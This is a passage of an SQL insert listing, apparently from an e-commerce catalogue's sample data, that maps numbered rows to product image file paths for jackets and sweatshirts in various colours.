(2222, 90, '/w/j/wj07-purple_back_1.jpg', 'image', 0),
(2223, 90, '/w/j/wj07-red_main_1.jpg', 'image', 0),
(2224, 90, '/w/j/wj07-purple_main_1.jpg', 'image', 0),
(2225, 90, '/w/j/wj07-purple_alt1_1.jpg', 'image', 0),
(2226, 90, '/w/j/wj07-purple_back_1.jpg', 'image', 0),
(2227, 90, '/w/j/wj08-gray_main_1.jpg', 'image', 0),
(2228, 90, '/w/j/wj08-gray_alt1_1.jpg', 'image', 0),
(2229, 90, '/w/j/wj08-gray_alternate_1.jpg', 'image', 0),
(2230, 90, '/w/j/wj08-gray_back_1.jpg', 'image', 0),
(2231, 90, '/w/j/wj08-orange_main_1.jpg', 'image', 0),
(2232, 90, '/w/j/wj08-purple_main_1.jpg', 'image', 0),
(2233, 90, '/w/j/wj08-gray_main_1.jpg', 'image', 0),
(2234, 90, '/w/j/wj08-gray_alt1_1.jpg', 'image', 0),
(2235, 90, '/w/j/wj08-gray_alternate_1.jpg', 'image', 0),
(2236, 90, '/w/j/wj08-gray_back_1.jpg', 'image', 0),
(2237, 90, '/w/j/wj08-orange_main_1.jpg', 'image', 0),
(2238, 90, '/w/j/wj08-purple_main_1.jpg', 'image', 0),
(2239, 90, '/w/j/wj08-gray_main_1.jpg', 'image', 0),
(2240, 90, '/w/j/wj08-gray_alt1_1.jpg', 'image', 0),
(2241, 90, '/w/j/wj08-gray_alternate_1.jpg', 'image', 0),
(2242, 90, '/w/j/wj08-gray_back_1.jpg', 'image', 0),
(2243, 90, '/w/j/wj08-orange_main_1.jpg', 'image', 0),
(2244, 90, '/w/j/wj08-purple_main_1.jpg', 'image', 0),
(2245, 90, '/w/j/wj08-gray_main_1.jpg', 'image', 0),
(2246, 90, '/w/j/wj08-gray_alt1_1.jpg', 'image', 0),
(2247, 90, '/w/j/wj08-gray_alternate_1.jpg', 'image', 0),
(2248, 90, '/w/j/wj08-gray_back_1.jpg', 'image', 0),
(2249, 90, '/w/j/wj08-orange_main_1.jpg', 'image', 0),
(2250, 90, '/w/j/wj08-purple_main_1.jpg', 'image', 0),
(2251, 90, '/w/j/wj08-gray_main_1.jpg', 'image', 0),
(2252, 90, '/w/j/wj08-gray_alt1_1.jpg', 'image', 0),
(2253, 90, '/w/j/wj08-gray_alternate_1.jpg', 'image', 0),
(2254, 90, '/w/j/wj08-gray_back_1.jpg', 'image', 0),
(2255, 90, '/w/j/wj08-orange_main_1.jpg', 'image', 0),
(2256, 90, '/w/j/wj08-purple_main_1.jpg', 'image', 0),
(2257, 90, '/w/j/wj08-gray_main_1.jpg', 'image', 0),
(2258, 90, '/w/j/wj08-gray_alt1_1.jpg', 'image', 0),
(2259, 90, '/w/j/wj08-gray_alternate_1.jpg', 'image', 0),
(2260, 90, '/w/j/wj08-gray_back_1.jpg', 'image', 0),
(2261, 90, '/w/j/wj09-blue_main_1.jpg', 'image', 0),
(2262, 90, '/w/j/wj09-gray_main_1.jpg', 'image', 0),
(2263, 90, '/w/j/wj09-green_main_1.jpg', 'image', 0),
(2264, 90, '/w/j/wj09-green_alt1_1.jpg', 'image', 0),
(2265, 90, '/w/j/wj09-green_back_1.jpg', 'image', 0),
(2266, 90, '/w/j/wj09-blue_main_1.jpg', 'image', 0),
(2267, 90, '/w/j/wj09-gray_main_1.jpg', 'image', 0),
(2268, 90, '/w/j/wj09-green_main_1.jpg', 'image', 0),
(2269, 90, '/w/j/wj09-green_alt1_1.jpg', 'image', 0),
(2270, 90, '/w/j/wj09-green_back_1.jpg', 'image', 0),
(2271, 90, '/w/j/wj09-blue_main_1.jpg', 'image', 0),
(2272, 90, '/w/j/wj09-gray_main_1.jpg', 'image', 0),
(2273, 90, '/w/j/wj09-green_main_1.jpg', 'image', 0),
(2274, 90, '/w/j/wj09-green_alt1_1.jpg', 'image', 0),
(2275, 90, '/w/j/wj09-green_back_1.jpg', 'image', 0),
(2276, 90, '/w/j/wj09-blue_main_1.jpg', 'image', 0),
(2277, 90, '/w/j/wj09-gray_main_1.jpg', 'image', 0),
(2278, 90, '/w/j/wj09-green_main_1.jpg', 'image', 0),
(2279, 90, '/w/j/wj09-green_alt1_1.jpg', 'image', 0),
(2280, 90, '/w/j/wj09-green_back_1.jpg', 'image', 0),
(2281, 90, '/w/j/wj09-blue_main_1.jpg', 'image', 0),
(2282, 90, '/w/j/wj09-gray_main_1.jpg', 'image', 0),
(2283, 90, '/w/j/wj09-green_main_1.jpg', 'image', 0),
(2284, 90, '/w/j/wj09-green_alt1_1.jpg', 'image', 0),
(2285, 90, '/w/j/wj09-green_back_1.jpg', 'image', 0),
(2286, 90, '/w/j/wj09-green_main_1.jpg', 'image', 0),
(2287, 90, '/w/j/wj09-green_alt1_1.jpg', 'image', 0),
(2288, 90, '/w/j/wj09-green_back_1.jpg', 'image', 0),
(2289, 90, '/w/j/wj10-black_main_1.jpg', 'image', 0),
(2290, 90, '/w/j/wj10-orange_main_1.jpg', 'image', 0),
(2291, 90, '/w/j/wj10-yellow_main_1.jpg', 'image', 0),
(2292, 90, '/w/j/wj10-yellow_alt1_1.jpg', 'image', 0),
(2293, 90, '/w/j/wj10-yellow_back_1.jpg', 'image', 0),
(2294, 90, '/w/j/wj10-black_main_1.jpg', 'image', 0),
(2295, 90, '/w/j/wj10-orange_main_1.jpg', 'image', 0),
(2296, 90, '/w/j/wj10-yellow_main_1.jpg', 'image', 0),
(2297, 90, '/w/j/wj10-yellow_alt1_1.jpg', 'image', 0),
(2298, 90, '/w/j/wj10-yellow_back_1.jpg', 'image', 0),
(2299, 90, '/w/j/wj10-black_main_1.jpg', 'image', 0),
(2300, 90, '/w/j/wj10-orange_main_1.jpg', 'image', 0),
(2301, 90, '/w/j/wj10-yellow_main_1.jpg', 'image', 0),
(2302, 90, '/w/j/wj10-yellow_alt1_1.jpg', 'image', 0),
(2303, 90, '/w/j/wj10-yellow_back_1.jpg', 'image', 0),
(2304, 90, '/w/j/wj10-black_main_1.jpg', 'image', 0),
(2305, 90, '/w/j/wj10-orange_main_1.jpg', 'image', 0),
(2306, 90, '/w/j/wj10-yellow_main_1.jpg', 'image', 0),
(2307, 90, '/w/j/wj10-yellow_alt1_1.jpg', 'image', 0),
(2308, 90, '/w/j/wj10-yellow_back_1.jpg', 'image', 0),
(2309, 90, '/w/j/wj10-black_main_1.jpg', 'image', 0),
(2310, 90, '/w/j/wj10-orange_main_1.jpg', 'image', 0),
(2311, 90, '/w/j/wj10-yellow_main_2.jpg', 'image', 0),
(2312, 90, '/w/j/wj10-yellow_alt1_2.jpg', 'image', 0),
(2313, 90, '/w/j/wj10-yellow_back_2.jpg', 'image', 0),
(2314, 90, '/w/j/wj10-yellow_main_2.jpg', 'image', 0),
(2315, 90, '/w/j/wj10-yellow_alt1_2.jpg', 'image', 0),
(2316, 90, '/w/j/wj10-yellow_back_2.jpg', 'image', 0),
(2317, 90, '/w/j/wj11-black_main_1.jpg', 'image', 0),
(2318, 90, '/w/j/wj11-blue_main_1.jpg', 'image', 0),
(2319, 90, '/w/j/wj11-blue_alt1_1.jpg', 'image', 0),
(2320, 90, '/w/j/wj11-blue_back_1.jpg', 'image', 0),
(2321, 90, '/w/j/wj11-orange_main_1.jpg', 'image', 0),
(2322, 90, '/w/j/wj11-black_main_1.jpg', 'image', 0),
(2323, 90, '/w/j/wj11-blue_main_1.jpg', 'image', 0),
(2324, 90, '/w/j/wj11-blue_alt1_1.jpg', 'image', 0),
(2325, 90, '/w/j/wj11-blue_back_1.jpg', 'image', 0),
(2326, 90, '/w/j/wj11-orange_main_1.jpg', 'image', 0),
(2327, 90, '/w/j/wj11-black_main_1.jpg', 'image', 0),
(2328, 90, '/w/j/wj11-blue_main_1.jpg', 'image', 0),
(2329, 90, '/w/j/wj11-blue_alt1_1.jpg', 'image', 0),
(2330, 90, '/w/j/wj11-blue_back_1.jpg', 'image', 0),
(2331, 90, '/w/j/wj11-orange_main_1.jpg', 'image', 0),
(2332, 90, '/w/j/wj11-black_main_1.jpg', 'image', 0),
(2333, 90, '/w/j/wj11-blue_main_1.jpg', 'image', 0),
(2334, 90, '/w/j/wj11-blue_alt1_1.jpg', 'image', 0),
(2335, 90, '/w/j/wj11-blue_back_1.jpg', 'image', 0),
(2336, 90, '/w/j/wj11-orange_main_1.jpg', 'image', 0),
(2337, 90, '/w/j/wj11-black_main_1.jpg', 'image', 0),
(2338, 90, '/w/j/wj11-blue_main_1.jpg', 'image', 0),
(2339, 90, '/w/j/wj11-blue_alt1_1.jpg', 'image', 0),
(2340, 90, '/w/j/wj11-blue_back_1.jpg', 'image', 0),
(2341, 90, '/w/j/wj11-orange_main_1.jpg', 'image', 0),
(2342, 90, '/w/j/wj11-blue_main_1.jpg', 'image', 0),
(2343, 90, '/w/j/wj11-blue_alt1_1.jpg', 'image', 0),
(2344, 90, '/w/j/wj11-blue_back_1.jpg', 'image', 0),
(2345, 90, '/w/j/wj06-blue_main_1.jpg', 'image', 0),
(2346, 90, '/w/j/wj06-green_main_1.jpg', 'image', 0),
(2347, 90, '/w/j/wj06-purple_main_1.jpg', 'image', 0),
(2348, 90, '/w/j/wj06-purple_alt1_1.jpg', 'image', 0),
(2349, 90, '/w/j/wj06-purple_back_1.jpg', 'image', 0),
(2350, 90, '/w/j/wj06-blue_main_1.jpg', 'image', 0),
(2351, 90, '/w/j/wj06-green_main_1.jpg', 'image', 0),
(2352, 90, '/w/j/wj06-purple_main_1.jpg', 'image', 0),
(2353, 90, '/w/j/wj06-purple_alt1_1.jpg', 'image', 0),
(2354, 90, '/w/j/wj06-purple_back_1.jpg', 'image', 0),
(2355, 90, '/w/j/wj06-blue_main_1.jpg', 'image', 0),
(2356, 90, '/w/j/wj06-green_main_1.jpg', 'image', 0),
(2357, 90, '/w/j/wj06-purple_main_1.jpg', 'image', 0),
(2358, 90, '/w/j/wj06-purple_alt1_1.jpg', 'image', 0),
(2359, 90, '/w/j/wj06-purple_back_1.jpg', 'image', 0),
(2360, 90, '/w/j/wj06-blue_main_1.jpg', 'image', 0),
(2361, 90, '/w/j/wj06-green_main_1.jpg', 'image', 0),
(2362, 90, '/w/j/wj06-purple_main_1.jpg', 'image', 0),
(2363, 90, '/w/j/wj06-purple_alt1_1.jpg', 'image', 0),
(2364, 90, '/w/j/wj06-purple_back_1.jpg', 'image', 0),
(2365, 90, '/w/j/wj06-blue_main_1.jpg', 'image', 0),
(2366, 90, '/w/j/wj06-green_main_1.jpg', 'image', 0),
(2367, 90, '/w/j/wj06-purple_main_1.jpg', 'image', 0),
(2368, 90, '/w/j/wj06-purple_alt1_1.jpg', 'image', 0),
(2369, 90, '/w/j/wj06-purple_back_1.jpg', 'image', 0),
(2370, 90, '/w/j/wj06-purple_main_1.jpg', 'image', 0),
(2371, 90, '/w/j/wj06-purple_alt1_1.jpg', 'image', 0),
(2372, 90, '/w/j/wj06-purple_back_1.jpg', 'image', 0),
(2373, 90, '/w/j/wj12-black_main_1.jpg', 'image', 0),
(2374, 90, '/w/j/wj12-blue_main_1.jpg', 'image', 0),
(2375, 90, '/w/j/wj12-blue_alt1_1.jpg', 'image', 0),
(2376, 90, '/w/j/wj12-blue_back_1.jpg', 'image', 0),
(2377, 90, '/w/j/wj12-purple_main_1.jpg', 'image', 0),
(2378, 90, '/w/j/wj12-black_main_1.jpg', 'image', 0),
(2379, 90, '/w/j/wj12-blue_main_1.jpg', 'image', 0),
(2380, 90, '/w/j/wj12-blue_alt1_1.jpg', 'image', 0),
(2381, 90, '/w/j/wj12-blue_back_1.jpg', 'image', 0),
(2382, 90, '/w/j/wj12-purple_main_1.jpg', 'image', 0),
(2383, 90, '/w/j/wj12-black_main_1.jpg', 'image', 0),
(2384, 90, '/w/j/wj12-blue_main_1.jpg', 'image', 0),
(2385, 90, '/w/j/wj12-blue_alt1_1.jpg', 'image', 0),
(2386, 90, '/w/j/wj12-blue_back_1.jpg', 'image', 0),
(2387, 90, '/w/j/wj12-purple_main_1.jpg', 'image', 0),
(2388, 90, '/w/j/wj12-black_main_1.jpg', 'image', 0),
(2389, 90, '/w/j/wj12-blue_main_1.jpg', 'image', 0),
(2390, 90, '/w/j/wj12-blue_alt1_1.jpg', 'image', 0),
(2391, 90, '/w/j/wj12-blue_back_1.jpg', 'image', 0),
(2392, 90, '/w/j/wj12-purple_main_1.jpg', 'image', 0),
(2393, 90, '/w/j/wj12-black_main_1.jpg', 'image', 0),
(2394, 90, '/w/j/wj12-blue_main_1.jpg', 'image', 0),
(2395, 90, '/w/j/wj12-blue_alt1_1.jpg', 'image', 0),
(2396, 90, '/w/j/wj12-blue_back_1.jpg', 'image', 0),
(2397, 90, '/w/j/wj12-purple_main_1.jpg', 'image', 0),
(2398, 90, '/w/j/wj12-blue_main_1.jpg', 'image', 0),
(2399, 90, '/w/j/wj12-blue_alt1_1.jpg', 'image', 0),
(2400, 90, '/w/j/wj12-blue_back_1.jpg', 'image', 0),
(2401, 90, '/w/s/ws02-blue_main_1.jpg', 'image', 0),
(2402, 90, '/w/s/ws02-green_main_1.jpg', 'image', 0),
(2403, 90, '/w/s/ws02-green_back_1.jpg', 'image', 0),
(2404, 90, '/w/s/ws02-red_main_1.jpg', 'image', 0),
(2405, 90, '/w/s/ws02-blue_main_1.jpg', 'image', 0),
(2406, 90, '/w/s/ws02-green_main_1.jpg', 'image', 0),
(2407, 90, '/w/s/ws02-green_back_1.jpg', 'image', 0),
(2408, 90, '/w/s/ws02-red_main_1.jpg', 'image', 0),
(2409, 90, '/w/s/ws02-blue_main_1.jpg', 'image', 0),
(2410, 90, '/w/s/ws02-green_main_1.jpg', 'image', 0),
(2411, 90, '/w/s/ws02-green_back_1.jpg', 'image', 0),
(2412, 90, '/w/s/ws02-red_main_1.jpg', 'image', 0),
(2413, 90, '/w/s/ws02-blue_main_1.jpg', 'image', 0),
(2414, 90, '/w/s/ws02-green_main_1.jpg', 'image', 0),
(2415, 90, '/w/s/ws02-green_back_1.jpg', 'image', 0),
(2416, 90, '/w/s/ws02-red_main_1.jpg', 'image', 0),
(2417, 90, '/w/s/ws02-blue_main_1.jpg', 'image', 0),
(2418, 90, '/w/s/ws02-green_main_1.jpg', 'image', 0),
(2419, 90, '/w/s/ws02-green_back_1.jpg', 'image', 0),
(2420, 90, '/w/s/ws02-red_main_1.jpg', 'image', 0),
(2421, 90, '/w/s/ws02-green_main_1.jpg', 'image', 0),
(2422, 90, '/w/s/ws02-green_back_1.jpg', 'image', 0),
(2423, 90, '/w/s/ws03-blue_main_1.jpg', 'image', 0),
(2424, 90, '/w/s/ws03-green_main_1.jpg', 'image', 0),
(2425, 90, '/w/s/ws03-red_main_1.jpg', 'image', 0),
(2426, 90, '/w/s/ws03-red_alt1_1.jpg', 'image', 0),
(2427, 90, '/w/s/ws03-red_back_1.jpg', 'image', 0),
(2428, 90, '/w/s/ws03-blue_main_1.jpg', 'image', 0),
(2429, 90, '/w/s/ws03-green_main_1.jpg', 'image', 0),
(2430, 90, '/w/s/ws03-red_main_1.jpg', 'image', 0),
(2431, 90, '/w/s/ws03-red_alt1_1.jpg', 'image', 0),
(2432, 90, '/w/s/ws03-red_back_1.jpg', 'image', 0),
(2433, 90, '/w/s/ws03-blue_main_1.jpg', 'image', 0),
(2434, 90, '/w/s/ws03-green_main_1.jpg', 'image', 0),
(2435, 90, '/w/s/ws03-red_main_1.jpg', 'image', 0),
(2436, 90, '/w/s/ws03-red_alt1_1.jpg', 'image', 0),
(2437, 90, '/w/s/ws03-red_back_1.jpg', 'image', 0),
(2438, 90, '/w/s/ws03-blue_main_1.jpg', 'image', 0),
(2439, 90, '/w/s/ws03-green_main_1.jpg', 'image', 0),
(2440, 90, '/w/s/ws03-red_main_1.jpg', 'image', 0),
(2441, 90, '/w/s/ws03-red_alt1_1.jpg', 'image', 0),
(2442, 90, '/w/s/ws03-red_back_1.jpg', 'image', 0),
(2443, 90, '/w/s/ws03-blue_main_1.jpg', 'image', 0),
(2444, 90, '/w/s/ws03-green_main_1.jpg', 'image', 0),
(2445, 90, '/w/s/ws03-red_main_1.jpg', 'image', 0),
(2446, 90, '/w/s/ws03-red_alt1_1.jpg', 'image', 0),
(2447, 90, '/w/s/ws03-red_back_1.jpg', 'image', 0),
(2448, 90, '/w/s/ws03-red_main_1.jpg', 'image', 0),
(2449, 90, '/w/s/ws03-red_alt1_1.jpg', 'image', 0),
(2450, 90, '/w/s/ws03-red_back_1.jpg', 'image', 0),
(2451, 90, '/w/s/ws04-blue_main_1.jpg', 'image', 0),
(2452, 90, '/w/s/ws04-green_main_1.jpg', 'image', 0),
(2453, 90, '/w/s/ws04-green_back_1.jpg', 'image', 0),
(2454, 90, '/w/s/ws04-red_main_1.jpg', 'image', 0),
(2455, 90, '/w/s/ws04-blue_main_1.jpg', 'image', 0),
(2456, 90, '/w/s/ws04-green_main_1.jpg', 'image', 0),
(2457, 90, '/w/s/ws04-green_back_1.jpg', 'image', 0),
(2458, 90, '/w/s/ws04-red_main_1.jpg', 'image', 0),
(2459, 90, '/w/s/ws04-blue_main_1.jpg', 'image', 0),
(2460, 90, '/w/s/ws04-green_main_1.jpg', 'image', 0),
(2461, 90, '/w/s/ws04-green_back_1.jpg', 'image', 0),
(2462, 90, '/w/s/ws04-red_main_1.jpg', 'image', 0),
(2463, 90, '/w/s/ws04-blue_main_1.jpg', 'image', 0),
(2464, 90, '/w/s/ws04-green_main_1.jpg', 'image', 0),
(2465, 90, '/w/s/ws04-green_back_1.jpg', 'image', 0),
(2466, 90, '/w/s/ws04-red_main_1.jpg', 'image', 0),
(2467, 90, '/w/s/ws04-blue_main_1.jpg', 'image', 0),
(2468, 90, '/w/s/ws04-green_main_1.jpg', 'image', 0),
(2469, 90, '/w/s/ws04-green_back_1.jpg', 'image', 0),
(2470, 90, '/w/s/ws04-red_main_1.jpg', 'image', 0),
(2471, 90, '/w/s/ws04-green_main_1.jpg', 'image', 0),
(2472, 90, '/w/s/ws04-green_back_1.jpg', 'image', 0),
(2473, 90, '/w/s/ws06-gray_main_1.jpg', 'image', 0),
(2474, 90, '/w/s/ws06-purple_main_1.jpg', 'image', 0),
(2475, 90, '/w/s/ws06-purple_back_1.jpg', 'image', 0),
(2476, 90, '/w/s/ws06-red_main_1.jpg', 'image', 0),
(2477, 90, '/w/s/ws06-gray_main_2.jpg', 'image', 0),
(2478, 90, '/w/s/ws06-purple_main_2.jpg', 'image', 0),
(2479, 90, '/w/s/ws06-purple_back_2.jpg', 'image', 0),
(2480, 90, '/w/s/ws06-red_main_1.jpg', 'image', 0),
(2481, 90, '/w/s/ws06-gray_main_2.jpg', 'image', 0),
(2482, 90, '/w/s/ws06-purple_main_2.jpg', 'image', 0),
(2483, 90, '/w/s/ws06-purple_back_2.jpg', 'image', 0),
(2484, 90, '/w/s/ws06-red_main_1.jpg', 'image', 0),
(2485, 90, '/w/s/ws06-gray_main_2.jpg', 'image', 0),
(2486, 90, '/w/s/ws06-purple_main_2.jpg', 'image', 0),
(2487, 90, '/w/s/ws06-purple_back_2.jpg', 'image', 0),
(2488, 90, '/w/s/ws06-red_main_1.jpg', 'image', 0),
(2489, 90, '/w/s/ws06-gray_main_2.jpg', 'image', 0),
(2490, 90, '/w/s/ws06-purple_main_2.jpg', 'image', 0),
(2491, 90, '/w/s/ws06-purple_back_2.jpg', 'image', 0),
(2492, 90, '/w/s/ws06-red_main_1.jpg', 'image', 0),
(2493, 90, '/w/s/ws06-purple_main_2.jpg', 'image', 0),
(2494, 90, '/w/s/ws06-purple_back_2.jpg', 'image', 0),
(2495, 90, '/w/s/ws07-black_main_1.jpg', 'image', 0),
(2496, 90, '/w/s/ws07-black_alt1_1.jpg', 'image', 0),
(2497, 90, '/w/s/ws07-black_back_1.jpg', 'image', 0),
(2498, 90, '/w/s/ws07-white_main_1.jpg', 'image', 0),
(2499, 90, '/w/s/ws07-yellow_main_1.jpg', 'image', 0),
(2500, 90, '/w/s/ws07-black_main_1.jpg', 'image', 0),
(2501, 90, '/w/s/ws07-black_alt1_1.jpg', 'image', 0),
(2502, 90, '/w/s/ws07-black_back_1.jpg', 'image', 0),
(2503, 90, '/w/s/ws07-white_main_1.jpg', 'image', 0),
(2504, 90, '/w/s/ws07-yellow_main_1.jpg', 'image', 0),
(2505, 90, '/w/s/ws07-black_main_1.jpg', 'image', 0),
(2506, 90, '/w/s/ws07-black_alt1_1.jpg', 'image', 0),
(2507, 90, '/w/s/ws07-black_back_1.jpg', 'image', 0),
(2508, 90, '/w/s/ws07-white_main_1.jpg', 'image', 0),
(2509, 90, '/w/s/ws07-yellow_main_1.jpg', 'image', 0),
(2510, 90, '/w/s/ws07-black_main_1.jpg', 'image', 0),
(2511, 90, '/w/s/ws07-black_alt1_1.jpg', 'image', 0),
(2512, 90, '/w/s/ws07-black_back_1.jpg', 'image', 0),
(2513, 90, '/w/s/ws07-white_main_1.jpg', 'image', 0),
(2514, 90, '/w/s/ws07-yellow_main_1.jpg', 'image', 0),
(2515, 90, '/w/s/ws07-black_main_1.jpg', 'image', 0),
(2516, 90, '/w/s/ws07-black_alt1_1.jpg', 'image', 0),
(2517, 90, '/w/s/ws07-black_back_1.jpg', 'image', 0),
(2518, 90, '/w/s/ws07-white_main_1.jpg', 'image', 0),
(2519, 90, '/w/s/ws07-yellow_main_1.jpg', 'image', 0),
(2520, 90, '/w/s/ws07-black_main_1.jpg', 'image', 0),
(2521, 90, '/w/s/ws07-black_alt1_1.jpg', 'image', 0),
(2522, 90, '/w/s/ws07-black_back_1.jpg', 'image', 0),
(2523, 90, '/w/s/ws08-black_main_1.jpg', 'image', 0),
(2524, 90, '/w/s/ws08-blue_main_1.jpg', 'image', 0),
(2525, 90, '/w/s/ws08-blue_back_1.jpg', 'image', 0),
(2526, 90, '/w/s/ws08-red_main_1.jpg', 'image', 0),
(2527, 90, '/w/s/ws08-black_main_1.jpg', 'image', 0),
(2528, 90, '/w/s/ws08-blue_main_1.jpg', 'image', 0),
(2529, 90, '/w/s/ws08-blue_back_1.jpg', 'image', 0),
(2530, 90, '/w/s/ws08-red_main_1.jpg', 'image', 0),
(2531, 90, '/w/s/ws08-black_main_1.jpg', 'image', 0),
(2532, 90, '/w/s/ws08-blue_main_1.jpg', 'image', 0),
(2533, 90, '/w/s/ws08-blue_back_1.jpg', 'image', 0),
(2534, 90, '/w/s/ws08-red_main_1.jpg', 'image', 0),
(2535, 90, '/w/s/ws08-black_main_1.jpg', 'image', 0),
(2536, 90, '/w/s/ws08-blue_main_1.jpg', 'image', 0),
(2537, 90, '/w/s/ws08-blue_back_1.jpg', 'image', 0),
(2538, 90, '/w/s/ws08-red_main_1.jpg', 'image', 0),
(2539, 90, '/w/s/ws08-black_main_1.jpg', 'image', 0),
(2540, 90, '/w/s/ws08-blue_main_1.jpg', 'image', 0),
(2541, 90, '/w/s/ws08-blue_back_1.jpg', 'image', 0),
(2542, 90, '/w/s/ws08-red_main_1.jpg', 'image', 0),
(2543, 90, '/w/s/ws08-blue_main_1.jpg', 'image', 0),
(2544, 90, '/w/s/ws08-blue_back_1.jpg', 'image', 0),
(2545, 90, '/w/s/ws09-blue_main_1.jpg', 'image', 0),
(2546, 90, '/w/s/ws09-blue_back_1.jpg', 'image', 0),
(2547, 90, '/w/s/ws09-red_main_1.jpg', 'image', 0),
(2548, 90, '/w/s/ws09-white_main_1.jpg', 'image', 0),
(2549, 90, '/w/s/ws09-blue_main_1.jpg', 'image', 0),
(2550, 90, '/w/s/ws09-blue_back_1.jpg', 'image', 0),
(2551, 90, '/w/s/ws09-red_main_1.jpg', 'image', 0),
(2552, 90, '/w/s/ws09-white_main_1.jpg', 'image', 0),
(2553, 90, '/w/s/ws09-blue_main_1.jpg', 'image', 0),
(2554, 90, '/w/s/ws09-blue_back_1.jpg', 'image', 0),
(2555, 90, '/w/s/ws09-red_main_1.jpg', 'image', 0),
(2556, 90, '/w/s/ws09-white_main_1.jpg', 'image', 0),
(2557, 90, '/w/s/ws09-blue_main_1.jpg', 'image', 0),
(2558, 90, '/w/s/ws09-blue_back_1.jpg', 'image', 0),
(2559, 90, '/w/s/ws09-red_main_1.jpg', 'image', 0),
(2560, 90, '/w/s/ws09-white_main_1.jpg', 'image', 0),
(2561, 90, '/w/s/ws09-blue_main_1.jpg', 'image', 0),
(2562, 90, '/w/s/ws09-blue_back_1.jpg', 'image', 0),
(2563, 90, '/w/s/ws09-red_main_1.jpg', 'image', 0),
(2564, 90, '/w/s/ws09-white_main_1.jpg', 'image', 0),
(2565, 90, '/w/s/ws09-blue_main_1.jpg', 'image', 0),
(2566, 90, '/w/s/ws09-blue_back_1.jpg', 'image', 0),
(2567, 90, '/w/s/ws10-green_main_1.jpg', 'image', 0),
(2568, 90, '/w/s/ws10-red_main_1.jpg', 'image', 0),
(2569, 90, '/w/s/ws10-red_back_1.jpg', 'image', 0),
(2570, 90, '/w/s/ws10-yellow_main_1.jpg', 'image', 0),
(2571, 90, '/w/s/ws10-green_main_1.jpg', 'image', 0),
(2572, 90, '/w/s/ws10-red_main_1.jpg', 'image', 0),
(2573, 90, '/w/s/ws10-red_back_1.jpg', 'image', 0),
(2574, 90, '/w/s/ws10-yellow_main_1.jpg', 'image', 0),
(2575, 90, '/w/s/ws10-green_main_1.jpg', 'image', 0),
(2576, 90, '/w/s/ws10-red_main_1.jpg', 'image', 0),
(2577, 90, '/w/s/ws10-red_back_1.jpg', 'image', 0),
(2578, 90, '/w/s/ws10-yellow_main_1.jpg', 'image', 0),
(2579, 90, '/w/s/ws10-green_main_1.jpg', 'image', 0),
(2580, 90, '/w/s/ws10-red_main_1.jpg', 'image', 0),
(2581, 90, '/w/s/ws10-red_back_1.jpg', 'image', 0),
(2582, 90, '/w/s/ws10-yellow_main_1.jpg', 'image', 0),
(2583, 90, '/w/s/ws10-green_main_1.jpg', 'image', 0),
(2584, 90, '/w/s/ws10-red_main_1.jpg', 'image', 0),
(2585, 90, '/w/s/ws10-red_back_1.jpg', 'image', 0),
(2586, 90, '/w/s/ws10-yellow_main_1.jpg', 'image', 0),
(2587, 90, '/w/s/ws10-red_main_1.jpg', 'image', 0),
(2588, 90, '/w/s/ws10-red_back_1.jpg', 'image', 0),
(2589, 90, '/w/s/ws11-green_main_1.jpg', 'image', 0),
(2590, 90, '/w/s/ws11-orange_main_1.jpg', 'image', 0),
(2591, 90, '/w/s/ws11-yellow_main_1.jpg', 'image', 0),
(2592, 90, '/w/s/ws11-yellow_back_1.jpg', 'image', 0),
(2593, 90, '/w/s/ws11-green_main_1.jpg', 'image', 0),
(2594, 90, '/w/s/ws11-orange_main_1.jpg', 'image', 0),
(2595, 90, '/w/s/ws11-yellow_main_1.jpg', 'image', 0),
(2596, 90, '/w/s/ws11-yellow_back_1.jpg', 'image', 0),
(2597, 90, '/w/s/ws11-green_main_1.jpg', 'image', 0),
(2598, 90, '/w/s/ws11-orange_main_1.jpg', 'image', 0),
(2599, 90, '/w/s/ws11-yellow_main_1.jpg', 'image', 0),
(2600, 90, '/w/s/ws11-yellow_back_1.jpg', 'image', 0),
(2601, 90, '/w/s/ws11-green_main_1.jpg', 'image', 0),
(2602, 90, '/w/s/ws11-orange_main_1.jpg', 'image', 0),
(2603, 90, '/w/s/ws11-yellow_main_1.jpg', 'image', 0),
(2604, 90, '/w/s/ws11-yellow_back_1.jpg', 'image', 0),
(2605, 90, '/w/s/ws11-green_main_1.jpg', 'image', 0),
(2606, 90, '/w/s/ws11-orange_main_1.jpg', 'image', 0),
(2607, 90, '/w/s/ws11-yellow_main_1.jpg', 'image', 0),
(2608, 90, '/w/s/ws11-yellow_back_1.jpg', 'image', 0),
(2609, 90, '/w/s/ws11-yellow_main_1.jpg', 'image', 0),
(2610, 90, '/w/s/ws11-yellow_back_1.jpg', 'image', 0),
(2611, 90, '/w/s/ws12-blue_main_1.jpg', 'image', 0),
(2612, 90, '/w/s/ws12-orange_main_1.jpg', 'image', 0),
(2613, 90, '/w/s/ws12-orange_back_1.jpg', 'image', 0),
(2614, 90, '/w/s/ws12-purple_main_1.jpg', 'image', 0),
(2615, 90, '/w/s/ws12-blue_main_1.jpg', 'image', 0),
(2616, 90, '/w/s/ws12-orange_main_1.jpg', 'image', 0),
(2617, 90, '/w/s/ws12-orange_back_1.jpg', 'image', 0),
(2618, 90, '/w/s/ws12-purple_main_1.jpg', 'image', 0),
(2619, 90, '/w/s/ws12-blue_main_2.jpg', 'image', 0),
(2620, 90, '/w/s/ws12-orange_main_2.jpg', 'image', 0),
(2621, 90, '/w/s/ws12-orange_back_2.jpg', 'image', 0),
(2622, 90, '/w/s/ws12-purple_main_2.jpg', 'image', 0),
(2623, 90, '/w/s/ws12-blue_main_2.jpg', 'image', 0),
(2624, 90, '/w/s/ws12-orange_main_2.jpg', 'image', 0),
(2625, 90, '/w/s/ws12-orange_back_2.jpg', 'image', 0),
(2626, 90, '/w/s/ws12-purple_main_2.jpg', 'image', 0),
(2627, 90, '/w/s/ws12-blue_main_2.jpg', 'image', 0),
(2628, 90, '/w/s/ws12-orange_main_2.jpg', 'image', 0),
(2629, 90, '/w/s/ws12-orange_back_2.jpg', 'image', 0),
(2630, 90, '/w/s/ws12-purple_main_2.jpg', 'image', 0),
(2631, 90, '/w/s/ws12-orange_main_2.jpg', 'image', 0),
(2632, 90, '/w/s/ws12-orange_back_2.jpg', 'image', 0),
(2633, 90, '/w/s/ws01-black_main_1.jpg', 'image', 0),
(2634, 90, '/w/s/ws01-black_back_1.jpg', 'image', 0),
(2635, 90, '/w/s/ws01-green_main_1.jpg', 'image', 0),
(2636, 90, '/w/s/ws01-yellow_main_1.jpg', 'image', 0),
(2637, 90, '/w/s/ws01-black_main_1.jpg', 'image', 0),
(2638, 90, '/w/s/ws01-black_back_1.jpg', 'image', 0),
